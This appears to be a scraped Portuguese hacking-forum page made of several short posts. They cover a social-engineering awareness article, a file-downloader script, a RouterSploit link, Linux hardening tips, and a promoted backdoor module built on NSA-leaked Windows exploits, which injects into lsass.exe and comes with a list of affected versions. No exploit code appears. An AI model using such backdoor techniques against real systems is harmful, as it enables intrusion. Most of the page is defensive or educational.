com funcionários capazes de reconhecer e evitar os tipos mais comuns de ataques de engenharia social é a melhor defesa nesses casos. Saiba mais sobre os tipos mais comuns de ações de engenharia social a que os funcionários devem saber reagir:[/align] Baiting Por meio dessa técnica, hackers deixam à disposição do usuário um dispositivo infectado com malware, como um pen-drive ou um CD. A intenção é despertar a curiosidade do indivíduo para que insira o dispositivo em uma máquina a fim de checar seu conteúdo. O sucesso dos ataques de baiting depende de três ações do indivíduo encontrar o dispositivo, abrir seu conteúdo e instalar o malware sem perceber. Uma vez instalado, o malware permite que o hacker tenha acesso aos sistemas da vítima. A tática envolve pouco trabalho por parte do hacker. Tudo que ele precisa fazer é infectar um dispositivo e ocasionalmente deixá-lo à vista do alvo, seja na entrada ou no interior dos escritórios. O dispositivo pode ser, por exemplo, um pen-drive contendo um arquivo com nome “chamativo”, como “folha salarial 2017”. Em 2011, a Bloomberg relatou que, em um teste feito com funcionários do governo norte-americano, 60% das pessoas pegaram um pen-drive deixado no estacionamento e plugaram nos computadores do escritório. No caso dos dispositivos que tinham um logo oficial, 90% instalaram o arquivo. Phishing O e-mail de phishing, apesar de já existir há anos, ainda é uma das técnicas mais comuns de engenharia social pelo alto nível de eficiência. O phishing ocorre quando um hacker produz comunicações fraudulentas que podem ser interpretadas como legítimas pela vítima por alegarem vir de fontes confiáveis. Em um ataque de phishing, os usuários podem ser coagidos a instalar um malware em seus dispositivos ou a compartilhar informações pessoais, financeiras ou de negócio. Apesar de o e-mail ser o modo mais tradicional para o envio de phishing, esse tipo de ataque também pode vir na forma de um contato telefônica ou de uma mensagem no Facebook, por exemplo. Os piores ataques de phishing se aproveitam de situações trágicas com o objetivo de explorar a boa vontade das pessoas, fazendo com que passem informações pessoais e de pagamento para realizar doações, por exemplo. Alguns e-mails de phishing são incrivelmente fáceis de identificar, no entanto, há os que são extremamente convincentes, simulando, por exemplo, comunicações do banco e empresas de cartão de crédito e comunicados oficiais da própria empresa pedindo para que os funcionários façam download de um novo software de segurança corporativa. Pretexting Por meio do pretexting, os hackers fabricam falsas circunstâncias para coagir a vítima a oferecer acesso a informações e sistemas críticos. Nesse caso, os hackers assumem uma nova identidade ou papel para fingir que são alguém de confiança da vítima. Tudo que o cibercriminoso precisa é dar uma olhada nos perfis da vítima nas redes sociais para descobrir informações como data e local de nascimento, empresa, cargo, nomes de parentes, colegas de trabalho, amigos, entre outros. Depois, basta enviar um e-mail (ou outro tipo de comunicação) à vítima fingindo a necessidade de confirmar dados para garantir seu acesso a algum sistema específico. Pode ser, por exemplo, um e-mail supostamente da equipe de TI coagindo a vítima a divulgar suas credenciais. Quid pro quo Um ataque de quid pro quo ocorre quando um hacker requer informações privadas de alguém em troca de algo. “Quid pro quo” basicamente significa “isso por aquilo”, em que o cibercriminoso oferece algo à vítima em troca de informações sensíveis. A tática mais comum envolve se passar por alguém da TI e abordar diversas vítimas encontrar alguém com um problema real de TI. Sob instruções do hacker, a vítima então dá acesso a códigos, desabilita programas vitais e instala malwares achando que conseguirá resolver seu problema. Outra tática bastante usada é a de simular uma pesquisa em que funcionários passam uma série de informações sensíveis em troca de brindes, como canetas e canecas. Spear phishing O spear-phishing é uma forma mais sofisticada de phishing que foca em indivíduos e organizações específicas. Nesse tipo de ataque, o hacker se passa por algum executivo ou outro membro chave da empresa e aborda funcionários com intuito de obter informações sensíveis. Os cibercriminosos podem obter, por meio das redes sociais, informações sobre o alvo e o quadro organizacional da empresa. Depois disso, basta enviar alguma comunicação fingindo ser, por exemplo, um dos executivos da empresa com uma demanda urgente que requer uma transação financeira imediata para uma conta específica. Esse tipo de ataque costuma ter altas taxas de sucesso no convencimento de funcionários para que executem ações específicas ou passem informações sensíveis. Segundo o SANS Institute Report de 2016, os ataques de spear-phishing estão cada vez mais efetivos pois são tão tecnicamente convincentes que a maioria dos destinatários não se dá ao trabalho de procurar por pequenos indícios de fraude ou tentar se comunicar com o remetente por outro meio. A técnica também está sendo muito utilizada de forma direcionada para pequenas e médias empresas, pois geralmente são menos maduras em segurança. Confira o nosso artigo para saber mais! Tailgating O tailgating é uma técnica física de engenharia social que ocorre quando indivíduos não autorizados seguem indivíduos autorizados até localizações seguras. O objetivo é obter ativos valiosos e informações confidenciais. É o caso, por exemplo, de quando alguém pede para o outro “segurar a porta” porque esqueceu seu cartão de acesso, ou pede seu smartphone ou computador emprestado para fazer “algo rapidinho”, mas na verdade instala malwares e rouba dados da máquina.
  36. 1 ponto
    O que é: AutoDownloader é um script python que permite optimizar em muito o nosso dia a dia. Para o que serve: Este script, serve para fazermos de forma automática download de multipls arquivos de uma extensão de um servidor (igual ao do anexo), mas tambem funciona em sites, para fazermos download de imagens destes, bastando saber a extensão do arquivo. Como Usar: python AutoDownloader.py [Extensão do Ficheiro] [Server] Exemplos: python AutoDownloader.py pdf http://127.0.0.1 python AutoDownloader.py docx https://127.0.0.1 Download: https://github.com/rubenandre/AutoDownloader
  37. 1 ponto
    Github https://github.com/reverse-shell/routersploit
  38. 1 ponto
    Opa, muio obrigado, vou começar meus estudos.
  39. 1 ponto
    PRINCIPAIS CANAIS DO YOUTUBE SOBRE TECNOLOGIA/HACKER Penetration Testing Alef Carvalho Alisam Technology Ares TI CaveiraTech Ciência Hacker Clavis Segurança da Informação Crazy Danish Hacker d1gg3r us Darkcode Hacking DEDSEC TOOL Deep Web Brasil DioLinux Diego Maciel Esecurity Treinamentos FenixSec Fábrica de Noobs Koshimaru Kisara Pesadelo Do Sistema Limon Tec Life Hacker Papo Binário Programação e Hacking Ricardo Longatto Roadsec Segurança Digital Sombra Hp Magno Tutor Portal Geek Live Xtreme Security Segurança Cavinato Hacker Security Nicholas Ferreira Jonatas Fil
  40. 1 ponto
    É fácil ter uma falsa sensação de segurança, pensando que outro sistema operacional pode ser mais direcionado do que o Linux, mas há uma abundância de riscos e vulnerabilidades para todos os tipos de dispositivos Linux. Mantenha sua guarda, independentemente do seu sistema operacional. Isto deve ser necessário, mas, mesmo assim, certifique-se de usar sempre uma forte e longa senha. Para a computação diária, faça login em uma conta de usuário básica e use sudo ou a conta de root somente quando necessário. É provável que este seja o comportamento padrão, mas vale a pena verificar o status da sua conta. Full disk encryption é o ideal, mas também é possível criptografar apenas o seu diretório home, por exemplo, em uma mesma máquina. Normalmente, isso é feito durante a instalação, e é difícil fazer depois. Nessa situação, a solução mais fácil é fazer backup de seus dados (sempre uma coisa boa!) e, em seguida, re-instalar o sistema operacional selecionando opções de criptografia. Se você realmente quiser tentar criptografar um sistema existente, o processo varia, dependendo da sua distribuição e partição de disco de instalação, então é melhor procurar por instruções relevantes para o seu ambiente. Reduza o tempo para o bloqueio entrar em vigor uma vez que o screensaver começa. É uma boa prática manter os aplicativos instalados no mínimo. Não só isso mantém sua máquina leve, mas também reduz sua exposição a vulnerabilidades. Além de examinar manualmente sua lista de aplicativos, talvez existam ferramentas disponíveis para sua distribuição, como o BleachBit. É normalmente fácil de manter o Linux e aplicativos instalados até a data. Pelo menos, certifique-se de que as atualizações de segurança são instaladas automaticamente. Isso pode ser feito através da instalação de um detector de rootkit, tais como o chkrootkit, que é facilmente executado com o comando sudo chkrootkit. Se você usar SSH para acesso remoto, existem algumas etapas simples para reduzir o risco de ataque. O mais fácil é usar uma porta diferente da porta padrão 22. Você também pode impedir o login remoto como root com PermitRootLogin no arquivo de configuração SSH. Este artigo tem mais dicas para proteger o SSH. Alguns daemons ouvem em portas externas. Desative esses serviços se não for necessário, por exemplo, sendmail ou bind. Isso também pode melhorar os tempos de inicialização. Para verificar se há serviços de escuta, use este comando: netstat -l | Grep tcp Seu sistema operacional pode ter um firewall embutido já, provavelmente iptables. Os firewalls podem ser confusos para configurar com a linha de comando, mas é provável que haja um frontend GUI disponível para controle mais fácil, como o Gufw. Estes podem ser instalados em seu sistema, por padrão, mas se não, vale a pena adicionar e configura-los. Ambos permitem aos usuários definir regras que limitam o modo como os aplicativos podem ser executados ou afetar outros processos e arquivos. A vantagem é que no caso de um ataque, os danos ao seu sistema é limitado. Você pode ler mais aqui sobre como usar o SELinux e o AppArmor. By: Wheezy Sec Fonte: https://spreadprivacy.com/linux-privacy-tips-1dc956657357
  41. 1 ponto
    Hoje trago a vocês um modulo desenvolvido a partir das ferramentas utilizadas pela NSA, foi apenas uma demonstração de como ela funciona, está falha está afetando diversas versões do Windows tornando-a uma grave falha para usuários do Windows, ela é executada junto com o processo do windows, variando a versão da arquitetura "x64 lsass.exe / x86 wlms.exe " com isso a modulo acaba gerando um backdoor diante desses processos, que acaba dificultando a visibilidade do backdoor, é acaba sendo quase "impossível" dele fechar o processo. Caso vocês se manifeste, irei fazer uma part.2 do video ensinando a adicionar o modulo é dando algumas dicas é explicações sobre a falha. VERSÕES AFETADAS 1 Windows XP (all services pack) (x86) (x64) 2 Windows Server 2003 SP0 (x86) 3 Windows Server 2003 SP1/SP2 (x86) 4 Windows Server 2003 (x64) 5 Windows Vista (x86) 6 Windows Vista (x64) 7 Windows Server 2008 (x86) 8 Windows Server 2008 R2 (x86) (x64) 9 Windows 7 (all services pack) (x86) (x64)
Esta tabela de classificação está definida como São Paulo/GMT-02:00
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.